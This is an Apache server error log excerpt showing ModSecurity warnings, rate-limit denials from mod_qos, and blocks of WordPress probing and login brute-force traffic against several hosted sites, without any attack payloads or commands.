[Tue May 26 20:00:43.294754 2026] [security2:error] [pid 112029:tid 112192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6SwAAASs"]
[Tue May 26 20:00:43.300861 2026] [security2:error] [pid 112029:tid 112212] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6VQAAAT8"]
[Tue May 26 20:00:43.303103 2026] [security2:error] [pid 112029:tid 112168] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6MwAAARM"]
[Tue May 26 20:00:43.310783 2026] [security2:error] [pid 112029:tid 112207] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6XAAAATo"]
[Tue May 26 20:00:43.317748 2026] [security2:error] [pid 112029:tid 112214] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6WQAAAUE"]
[Tue May 26 20:00:43.320168 2026] [security2:error] [pid 112029:tid 112187] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6RwAAASY"]
[Tue May 26 20:00:43.325571 2026] [security2:error] [pid 112029:tid 112181] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6QgAAASA"]
[Tue May 26 20:00:43.335005 2026] [security2:error] [pid 112029:tid 112193] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6TAAAASw"]
[Tue May 26 20:00:43.336886 2026] [security2:error] [pid 112029:tid 112183] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6QQAAASI"]
[Tue May 26 20:00:43.343433 2026] [security2:error] [pid 112029:tid 112209] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6VAAAATw"]
[Tue May 26 20:00:43.346768 2026] [security2:error] [pid 112029:tid 112265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6cQAAAXQ"]
[Tue May 26 20:00:43.349961 2026] [security2:error] [pid 112029:tid 112194] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6XwAAAS0"]
[Tue May 26 20:00:43.355703 2026] [security2:error] [pid 112029:tid 112266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6cgAAAXU"]
[Tue May 26 20:00:43.371107 2026] [security2:error] [pid 112029:tid 112218] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6ZQAAAUU"]
[Tue May 26 20:00:43.376501 2026] [security2:error] [pid 112029:tid 112203] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukaFW0C-ajaCsyFc6YAAAATY"]
[Tue May 26 20:00:43.385615 2026] [security2:error] [pid 112029:tid 112215] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6jwAAAUI"]
[Tue May 26 20:00:43.398758 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l2QAAALY"]
[Tue May 26 20:00:43.399138 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l5wAAAJ4"]
[Tue May 26 20:00:43.402504 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l5gAAAQE"]
[Tue May 26 20:00:43.404616 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l0AAAANA"]
[Tue May 26 20:00:43.408393 2026] [security2:error] [pid 112029:tid 112217] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6jAAAAUQ"]
[Tue May 26 20:00:43.414324 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1lzgAAAJ8"]
[Tue May 26 20:00:43.430850 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l5QAAANI"]
[Tue May 26 20:00:43.436497 2026] [security2:error] [pid 112029:tid 112222] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6iwAAAUk"]
[Tue May 26 20:00:43.438948 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l6wAAAKg"]
[Tue May 26 20:00:43.451119 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l9QAAAPo"]
[Tue May 26 20:00:43.455641 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l8wAAANE"]
[Tue May 26 20:00:43.461859 2026] [security2:error] [pid 112029:tid 112240] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk6FW0C-ajaCsyFc6rAAAAVs"]
[Tue May 26 20:00:43.462105 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l3gAAALU"]
[Tue May 26 20:00:43.463656 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l8QAAAQA"]
[Tue May 26 20:00:43.463727 2026] [security2:error] [pid 112029:tid 112198] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6kQAAATE"]
[Tue May 26 20:00:43.468385 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l9gAAAI0"]
[Tue May 26 20:00:43.592160 2026] [security2:error] [pid 112029:tid 112254] [client 103.163.220.39:46861] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/IXR/"] [unique_id "ahWuk6FW0C-ajaCsyFc61AAAAWk"]
[Tue May 26 20:00:43.599320 2026] [qos:error] [pid 112029:tid 112273] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuk6FW0C-ajaCsyFc63AAAAXw
[Tue May 26 20:00:43.600141 2026] [qos:error] [pid 106517:tid 106696] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mmQAAALI
[Tue May 26 20:00:43.606324 2026] [qos:error] [pid 112029:tid 112165] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuk6FW0C-ajaCsyFc64gAAARA
[Tue May 26 20:00:43.607119 2026] [qos:error] [pid 112029:tid 112161] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuk6FW0C-ajaCsyFc64wAAAQw
[Tue May 26 20:00:43.617580 2026] [qos:error] [pid 106517:tid 106709] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mngAAAL8
[Tue May 26 20:00:43.618204 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mnwAAAQQ
[Tue May 26 20:00:43.618304 2026] [qos:error] [pid 112029:tid 112280] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk6FW0C-ajaCsyFc65AAAAYM
[Tue May 26 20:00:43.621688 2026] [qos:error] [pid 112029:tid 112183] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuk6FW0C-ajaCsyFc65gAAASI
[Tue May 26 20:00:43.626876 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1moAAAAK4
[Tue May 26 20:00:43.638953 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1moQAAAOE
[Tue May 26 20:00:43.753258 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mpwAAAMs
[Tue May 26 20:00:43.757859 2026] [qos:error] [pid 112029:tid 112283] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk6FW0C-ajaCsyFc66QAAAYY
[Tue May 26 20:00:43.759211 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mqAAAAK4
[Tue May 26 20:00:43.767892 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mqQAAAP8
[Tue May 26 20:00:43.769594 2026] [qos:error] [pid 112029:tid 112197] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk6FW0C-ajaCsyFc66gAAATA
[Tue May 26 20:00:43.769885 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mqgAAAOE
[Tue May 26 20:00:43.772783 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mqwAAAKo
[Tue May 26 20:00:43.773972 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:46430] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mrAAAAO0
[Tue May 26 20:00:43.780440 2026] [qos:error] [pid 106517:tid 106766] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mrwAAAPg
[Tue May 26 20:00:43.793469 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:46374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1msgAAAK4
[Tue May 26 20:00:43.800423 2026] [security2:error] [pid 106517:tid 106523] [remote 72.167.150.128:43728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mnAAA3AM"]
[Tue May 26 20:00:43.905748 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mtQAAAP8
[Tue May 26 20:00:43.907901 2026] [qos:error] [pid 112029:tid 112264] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk6FW0C-ajaCsyFc67wAAAXM
[Tue May 26 20:00:43.913446 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mtgAAAP4
[Tue May 26 20:00:43.920640 2026] [qos:error] [pid 106517:tid 106750] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mtwAAAOg
[Tue May 26 20:00:43.921370 2026] [qos:error] [pid 112029:tid 112266] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk6FW0C-ajaCsyFc68AAAAXU
[Tue May 26 20:00:43.922131 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1muAAAAOE
[Tue May 26 20:00:43.925791 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:46430] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1muQAAAKo
[Tue May 26 20:00:43.926396 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mugAAAO0
[Tue May 26 20:00:43.932674 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mvAAAAJE
[Tue May 26 20:00:43.948274 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:46374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuk4ZZc2DoU1lPnP1mvgAAANY
[Tue May 26 20:00:43.979166 2026] [security2:error] [pid 106517:tid 106656] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mZgAAAIs"]
[Tue May 26 20:00:44.101170 2026] [security2:error] [pid 106517:tid 106597] [remote 72.167.150.128:43728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWulIZZc2DoU1lPnP1mwwAA_k0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:00:44.178165 2026] [security2:error] [pid 112029:tid 112252] [client 103.163.220.33:64885] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/plugin/"] [unique_id "ahWulKFW0C-ajaCsyFc69QAAAWc"]
[Tue May 26 20:00:44.283366 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mBQAAAOY"]
[Tue May 26 20:00:44.284281 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mBAAAAK0"]
[Tue May 26 20:00:44.285142 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mCgAAAPw"]
[Tue May 26 20:00:44.285192 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mCAAAAQI"]
[Tue May 26 20:00:44.303719 2026] [security2:error] [pid 112029:tid 112225] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6kgAAAUw"]
[Tue May 26 20:00:44.306991 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mEgAAAL4"]
[Tue May 26 20:00:44.311911 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mBwAAAPk"]
[Tue May 26 20:00:44.320410 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1l-gAAAJs"]
[Tue May 26 20:00:44.321242 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mFwAAAPQ"]
[Tue May 26 20:00:44.322944 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mAgAAAMk"]
[Tue May 26 20:00:44.324171 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukoZZc2DoU1lPnP1mHQAAAKw"]
[Tue May 26 20:00:44.354459 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mbAAAAKE"]
[Tue May 26 20:00:44.357692 2026] [security2:error] [pid 106517:tid 106764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuk4ZZc2DoU1lPnP1mVwAAAPY"]
[Tue May 26 20:00:44.364596 2026] [security2:error] [pid 112029:tid 112190] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6kwAAASk"]
[Tue May 26 20:00:44.366953 2026] [security2:error] [pid 112029:tid 112164] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWukqFW0C-ajaCsyFc6lAAAAQ8"]
